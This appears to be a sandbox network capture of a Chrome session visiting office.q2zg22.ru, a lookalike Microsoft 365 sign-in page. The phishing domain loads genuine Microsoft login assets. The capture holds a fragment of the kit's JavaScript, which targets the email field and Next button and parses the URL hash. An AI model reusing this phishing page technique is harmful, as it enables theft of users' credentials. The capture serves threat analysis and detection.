                                                                                                                          2024-02-02 19:17:49 UTC727INData Raw: 33 32 36 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 70 28 29 7b 0a 20 20 76 61 72 20 65 6d 61 69 6c 49 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 30 31 31 36 22 29 3b 0a 20 20 76 61 72 20 6e 65 78 74 42 75 74 74 6f 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 64 53 49 42 75 74 74 6f 6e 39 22 29 3b 0a 20 20 76 61 72 20 71 75 65 72 79 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 20 20 69 66 20 28 2f 23 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 0a 20 20 76 61 72 20 72 65 73 20 3d 20 71 75 65 72 79 2e 73 70 6c 69 74 28 22 23 22 29 3b 0a 20 20 76 61 72 20 64 61 74 61 31 20 3d 20 72 65 73 5b 30 5d 3b
                                                                                                                          Data Ascii: 326function lp(){ var emailId = document.querySelector("#i0116"); var nextButton = document.querySelector("#idSIButton9"); var query = window.location.href; if (/#/.test(window.location.href)){ var res = query.split("#"); var data1 = res[0];
                                                                                                                          2024-02-02 19:17:49 UTC86INData Raw: 7d 0a 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 20 20 7d 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 0a 0d 0a
                                                                                                                          Data Ascii: } setTimeout(function(){lp();}, 500); } setTimeout(function(){lp();}, 500);
                                                                                                                          2024-02-02 19:17:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.1649755172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:49 UTC2627OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8
                                                                                                                          2024-02-02 19:17:49 UTC642INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:49 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GLvEMqH%2BbfxWvExvrm912pHFO2RV9WcUka9Jd7beRCV2dUdo6g8SqP9aag5qYgbcM4TK2ER1L0ayNgRPEPnDmLZr8LmO5EUOzFkf0IBSBSMcmR%2FGdG7URerOeCCMkfPKHC7F"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6c6c97c12da-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.1649753152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:49 UTC642OUTGET /ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.css HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://office.q2zg22.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:49 UTC734INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 3080491
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: kqhA3D0Xczna4D/t8ioitQ==
                                                                                                                          Content-Type: text/css
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:49 GMT
                                                                                                                          Etag: 0x8DC070858CA028D
                                                                                                                          Last-Modified: Wed, 27 Dec 2023 18:19:21 GMT
                                                                                                                          Server: ECAcc (aga/6D24)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 440a9fa6-c01e-00ef-6608-3ac64e000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 113084
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 2f 2a 21 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 2f 2a 21 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20
                                                                                                                          Data Ascii: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------This file is based on or incorporates material from the projects listed
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 73 2d 31 2c 2e 63 6f 6c 2d 78 73 2d 32 2c 2e 63 6f 6c 2d 78 73 2d 33 2c 2e 63 6f 6c 2d 78 73 2d 34 2c 2e 63 6f 6c 2d 78 73 2d 35 2c 2e 63 6f 6c 2d 78 73 2d 36 2c 2e 63 6f 6c 2d 78 73 2d 37 2c 2e 63 6f 6c 2d 78 73 2d 38 2c 2e 63 6f 6c 2d 78 73 2d 39 2c 2e 63 6f 6c 2d 78 73 2d 31 30 2c 2e 63 6f 6c 2d 78 73 2d 31 31 2c 2e 63 6f 6c 2d 78 73 2d 31 32 2c 2e 63 6f 6c 2d 78 73 2d 31 33 2c 2e 63 6f 6c 2d 78 73 2d 31 34 2c 2e 63 6f 6c 2d 78 73 2d 31 35 2c 2e 63 6f 6c 2d 78 73 2d 31 36 2c 2e 63 6f 6c 2d 78 73 2d 31 37 2c 2e 63 6f 6c 2d 78 73 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 78 73 2d 32 34 7b 66 6c 6f 61 74 3a
                                                                                                                          Data Ascii: s-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-13,.col-xs-14,.col-xs-15,.col-xs-16,.col-xs-17,.col-xs-18,.col-xs-19,.col-xs-20,.col-xs-21,.col-xs-22,.col-xs-23,.col-xs-24{float:
                                                                                                                          2024-02-02 19:17:49 UTC2INData Raw: 72 67
                                                                                                                          Data Ascii: rg
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 69 6e 2d 6c 65 66 74 3a 39 35 2e 38 33 33 33 33 25 7d 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 32 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 30 25 7d 7d 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 6c 65 67 65 6e 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78
                                                                                                                          Data Ascii: in-left:95.83333%}.col-xl-offset-24{margin-left:100%}}fieldset{padding:0;margin:0;border:0;min-width:0}legend{display:block;width:100%;padding:0;border:0}label{display:inline-block;max-width:100%}input[type="search"]{-webkit-box-sizing:border-box;-moz-box
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 6f 77 2d 78 3a 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2e 30 31 25 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 33 39 70 78 29 7b 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 2d 6d 73 2d 61 75 74 6f 68 69 64 69 6e 67 2d 73 63 72 6f 6c 6c 62 61 72 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 3e 2e 74 61 62 6c 65 3e 74 68 65 61 64 3e 74 72 3e 74 68 2c 2e 74 61 62 6c
                                                                                                                          Data Ascii: ow-x:auto;min-height:.01%}@media screen and (max-width:539px){.table-responsive{width:100%;margin-bottom:15px;overflow-y:hidden;-ms-overflow-style:-ms-autohiding-scrollbar}.table-responsive>.table{margin-bottom:0}.table-responsive>.table>thead>tr>th,.tabl
                                                                                                                          2024-02-02 19:17:49 UTC2INData Raw: 22 2c
                                                                                                                          Data Ascii: ",
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 22 54 75 6e 67 61 22 2c 22 4c 61 6f 20 55 49 22 2c 22 52 61 61 76 69 22 2c 22 49 73 6b 6f 6f 6c 61 20 50 6f 74 61 22 2c 22 4c 61 74 68 61 22 2c 22 4c 65 65 6c 61 77 61 64 65 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 20 55 49 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4a 68 65 6e 67 48 65 69 20 55 49 22 2c 22 4d 61 6c 67 75 6e 20 47 6f 74 68 69 63 22 2c 22 45 73 74 72 61 6e 67 65 6c 6f 20 45 64 65 73 73 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 48 69 6d 61 6c 61 79 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4e 65 77 20 54 61 69 20 4c 75 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 50 68 61 67 73 50 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69
                                                                                                                          Data Ascii: "Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongoli
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 70 65 3d 22 72 65 73 65 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 35 64 61 36 7d 2e 62 74 6e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 2d 66 6f 63 75 73 2c 2e 62 74 6e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 2c 62 75 74 74 6f 6e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f
                                                                                                                          Data Ascii: pe="reset"].btn-primary:hover{background-color:#005da6}.btn.btn-primary-focus,.btn.btn-primary:focus,button.btn-primary:focus,input[type="button"].btn-primary:focus,input[type="submit"].btn-primary:focus,input[type="reset"].btn-primary:focus{background-co
                                                                                                                          2024-02-02 19:17:49 UTC2INData Raw: 69 6e
                                                                                                                          Data Ascii: in
                                                                                                                          2024-02-02 19:17:49 UTC14780INData Raw: 2d 74 6f 70 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 32 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 3b 63 6f 6c 6f 72 3a 23 31 62 31 62 31 62 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 36 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78
                                                                                                                          Data Ascii: -top:20px;margin-bottom:1.25rem;margin-top:1.25rem;font-size:24px;line-height:28px;font-weight:300;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px;color:#1b1b1b;font-size:1.5rem;font-weight:600;padding:0;margin-top:16px;margin-bottom:12px


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.2.1649752152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:49 UTC619OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_rT0zkaZkTfaSAkKPThHEog2.js HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://office.q2zg22.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:49 UTC750INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 1775852
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: RMeXXxzd9RR9j99J9A/YZA==
                                                                                                                          Content-Type: application/x-javascript
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:49 GMT
                                                                                                                          Etag: 0x8DC12F3B5202B34
                                                                                                                          Last-Modified: Thu, 11 Jan 2024 22:21:50 GMT
                                                                                                                          Server: ECAcc (aga/8788)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 03c1cbef-801e-0093-57e5-45c057000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 431980
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 73 74 73 3a 22 31 30 30 33 30 33 37 22 2c 55 73 65 72 41 63 63 6f 75 6e 74 4e 6f 74 46 6f 75 6e 64 4e 6f 74 43 6f 6e 66 69 67 75 72 65 64 46 6f 72 52 65 6d 6f 74 65 4e 67 63 3a 22 35 30 30 33 34 32 22 2c 55 73 65 72 41 63 63 6f 75 6e 74 4e 6f 74 46 6f 75 6e 64 46 61 69 6c 65 64 54 6f 43 72 65 61 74 65 52 65 6d 6f 74 65 53 69 67 6e 49 6e 3a 22 35 30 30 33 34 33 22 2c 55 73 65 72 41 63 63 6f 75 6e 74 4e 6f 74 46 6f 75 6e 64 46 6f 72 46 69 64 6f 53 69 67 6e 49 6e 3a 22 35 30 30 33 34 34 22 2c 49 64 73 4c 6f 63 6b 65 64 3a 22 35 30 30 35 33 22 2c 49 6e 76 61 6c 69 64 50 61 73 73 77 6f 72 64 4c 61 73 74 50 61 73 73 77 6f 72 64 55 73 65 64 3a 22 35 30 30 35 34 22 2c 49 6e 76 61 6c 69 64 50 61 73 73 77 6f 72 64 45 78 70 69 72 65 64 50 61 73 73 77 6f 72 64 3a 22
                                                                                                                          Data Ascii: sts:"1003037",UserAccountNotFoundNotConfiguredForRemoteNgc:"500342",UserAccountNotFoundFailedToCreateRemoteSignIn:"500343",UserAccountNotFoundForFidoSignIn:"500344",IdsLocked:"50053",InvalidPasswordLastPasswordUsed:"50054",InvalidPasswordExpiredPassword:"
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 71 75 65 72 79 5b 65 5b 30 5d 5d 3d 65 5b 31 5d 7d 29 29 29 2c 50 2e 6a 6f 69 6e 28 74 29 7d 2c 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 2c 69 29 7b 76 61 72 20 61 3d 50 2e 70 61 72 73 65 28 65 29 3b 61 2e 71 75 65 72 79 3d 61 2e 71 75 65 72 79 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 73 2e 66 69 6e 64 4f 77 6e 50 72 6f 70 65 72 74 79 28 61 2e 71 75 65 72 79 2c 6e 2c 21 30 29 3b 6f 26 26 64 65 6c 65 74 65 20 61 2e 71 75 65 72 79 5b 6f 5d 2c 61 2e 71 75 65 72 79 5b 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 3d 74 3b 76 61 72 20 72 3d 50 2e 6a 6f 69 6e 28 61 29 3b 72 65 74 75 72 6e 20 69 26 26 72 2e 6c 65 6e 67 74 68 3e 69 3f 65 3a 72 7d 2c 72 65 6d 6f 76 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72
                                                                                                                          Data Ascii: query[e[0]]=e[1]}))),P.join(t)},appendOrReplace:function(e,n,t,i){var a=P.parse(e);a.query=a.query||{};var o=s.findOwnProperty(a.query,n,!0);o&&delete a.query[o],a.query[n.toLowerCase()]=t;var r=P.join(a);return i&&r.length>i?e:r},remove:function(e,n){var
                                                                                                                          2024-02-02 19:17:49 UTC3INData Raw: 2e 68 69
                                                                                                                          Data Ascii: .hi
